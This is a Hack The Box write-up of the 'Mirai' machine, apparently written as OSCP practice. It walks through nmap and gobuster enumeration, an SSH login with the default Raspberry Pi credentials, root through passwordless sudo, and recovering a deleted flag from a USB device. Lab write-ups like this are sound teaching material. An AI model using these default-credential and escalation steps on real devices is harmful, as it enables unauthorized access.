Hack The Box - Mirai
Introduction
Mirai is rated 4.2 and is an easy box. It is a short machine and the privesc is more CTF than OSCP like but you still learn something while solving the machine. Without losing much time talking I will start with the enumeration of the box.
Enumeration
I start using Nmap as always.
Nmap Scan
The first thing I do is a simple scan of all ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ sudo nmap -sS -p- mirai.htb --min-rate 1000
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-06 13:50 CEST
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.16s latency).
Not shown: 65529 closed ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http
1318/tcp open krb5gatekeeper
32400/tcp open plex
32469/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 89.36 seconds
There are 6 open ports that Nmap found. On those ports I will do a deep scan using the -A flag):
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ sudo nmap -A -p 22,53,80,1318,32400,32469 mirai.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-06 13:52 CEST
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.20s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Website Blocked
1318/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-favicon: Plex
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%),
Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%),
Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 4.8 (94%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 76.67 ms 10.10.16.1
2 137.61 ms mirai.htb (10.10.10.48)
Nmap done: 1 IP address (1 host up) scanned in 28.02 seconds
I also do a UDP scan of the top 1000 ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ sudo nmap -sU mirai.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-06 14:16 CEST
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
53/udp open|filtered domain
68/udp open|filtered dhcpc
123/udp open|filtered ntp
1900/udp open|filtered upnp
1901/udp open|filtered fjicl-tep-a
5353/udp open|filtered zeroconf
Nmap done: 1 IP address (1 host up) scanned in 1097.33 seconds
There are 6 open ports too. Here is the deep scan of those open UDP ports:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ sudo nmap -sUV -p 53,68,123,1900,1901,5353 10.10.10.48
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-06 14:37 CEST
Nmap scan report for mirai.htb (10.10.10.48)
Host is up (0.62s latency).
PORT STATE SERVICE VERSION
53/udp open domain dnsmasq 2.76
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (unsynchronized)
1900/udp open|filtered upnp
1901/udp open|filtered fjicl-tep-a
5353/udp open mdns DNS-based service discovery
Nmap done: 1 IP address (1 host up) scanned in 113.17 seconds
I do not think that this information helps me. If I’m stuck later, I can always come back to this.
Service Enumeration
SSH must not be enumerated further because there is no exploit available for this version. I leave the plex media server as well because I have not many information about it.
Port 53 ( DNS)
On this port runs a DNS server (dnsmasq 2.76), I can’t transfer the zone, it seems that there are none vulnerabilities in this service. There is no exploit that will lead to some sort of RCE.
Port 1318 & 32469 (Platinum UPnP 1.0.5.13)
This service is also a rabbit hole, I tried some exploits but none of them worked. It might be already manually patched, tough the version is still the same.
Port 80 (Web Server)
I tried to visit the webpage, but it does not work. I noticed that I can only access the webpage using the IP address. So I performed a gobuster scan:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ gobuster dir -u 10.10.10.48 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -o gobuster.txt -x php,html,log,txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.48
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,log,txt
[+] Timeout: 10s
===============================================================
2021/09/06 14:50:57 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> http://10.10.10.48/admin/]
versions (Status: 200) [Size: 13]
===============================================================
2021/09/06 15:08:00 Finished
===============================================================
I visit the admin page, there is a control panel for a pi-hole. A possible exploit exists for this version if the path for www-data is the same as the following string: /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin.
You can find the exploit on Github:
Exploitation
I download the exploit and try to run it without any arguments. This will show me how to use the exploit script:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ python3 exploit.py -h
usage: exploit.py [-h] url password ip port
Receive a reverse shell on a Pi-hole with access to the admin web console
positional arguments:
url The URL of the Pi-hole console
password The admin password for the Pi-hole console
ip The IP address for the reverse shell to connect to
port The port for the reverse shell to connect to
optional arguments:
-h, --help show this help message and exit
The script needs the administrator’s password for the console as an additional parameter. So I search for the default credentials. The credentials are pi:raspberry. The exploit did not work so I just try the default username and password for SSH:
┌──(user㉿KaliVM)-[/hackthebox/oscp-prep/mirai]
└─$ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: *raspberry*
---snip---
pi@raspberrypi:~ $
I didn’t thought that this is going to work but I’m happy about it. The user pi is the only user on the system, so the flag must be in its home directory:
pi@raspberrypi:~ $ cd /home
pi@raspberrypi:/home $ ls
pi
User Flag
Since the user pi is the only user on the system, I can get the user flag:
pi@raspberrypi:~ $ ls
background.jpg Desktop Documents Downloads Music oldconffiles python_games Videos
pi@raspberrypi:~ $ cd Desktop
pi@raspberrypi:~/Desktop $ ls
Plex user.txt
pi@raspberrypi:~/Desktop $ cat user.txt
ff**************************838d
pi@raspberrypi:~/Desktop $
Privesc
I noticed that there is a directory called oldconffiles, but I could not find anything useful inside of it. The next thing I do normally is to use the sudo -l command:
pi@raspberrypi:~/oldconffiles/.config/pcmanfm/LXDE-pi $ sudo -l
Matching Defaults entries for pi on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User pi may run the following commands on localhost:
(ALL : ALL) ALL
(ALL) NOPASSWD: ALL
Is that a joke? I can execute all commands as sudo? Without a pssword? I use bash to test this:
pi@raspberrypi:~/oldconffiles/.config/pcmanfm/LXDE-pi $ sudo bash
root@raspberrypi:/home/pi/oldconffiles/.config/pcmanfm/LXDE-pi# id
uid=0(root) gid=0(root) groups=0(root)
I think that was the fastest privesc I’ve ever done. This can’t be it, but I still try to get the root flag:
root@raspberrypi:~# ls
root.txt
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
Oh, that’s what I expected, it would have been too easy. I to search for other drives like disks or USB sticks (I found a USB drive):
root@raspberrypi:~# lsblk
NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT
sda 8:0 0 10G 0 disk
├─sda1 8:1 0 1.3G 0 part /lib/live/mount/persistence/sda1
└─sda2 8:2 0 8.7G 0 part /lib/live/mount/persistence/sda2
sdb 8:16 0 10M 0 disk /media/usbstick
sr0 11:0 1 1024M 0 rom
loop0 7:0 0 1.2G 1 loop /lib/live/mount/rootfs/filesystem.squashfs
root@raspberrypi:~# cd /media/usbstick/
root@raspberrypi:/media/usbstick# ls
damnit.txt lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
This file tells me that the root flag is deleted, but I might be able to recover it. The USB stick is located at sdb, which is in /dev/sdb. Let’s check the file system (the root flag should be one of the last files, the last one is the message that james wrote):
root@raspberrypi:/tmp/testdisk# cat /dev/sdb
---snip---
.
..
$
lost+found
root.txt
---snip---
([" 1YS1Y
<Byc[B)>r &<yZ.Gum^>
1Y
|}*,.+-3d**************************020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
The part where I put the asterisk is the root flag. That wasn’t so hard to do.
Conclusions
The box in general was very easy but the part where I had to recover the root flag was tricky. It took me some moments to realize what I was supposed to do. But is was a nice challenge to boost the confidence level for the OSCP exam.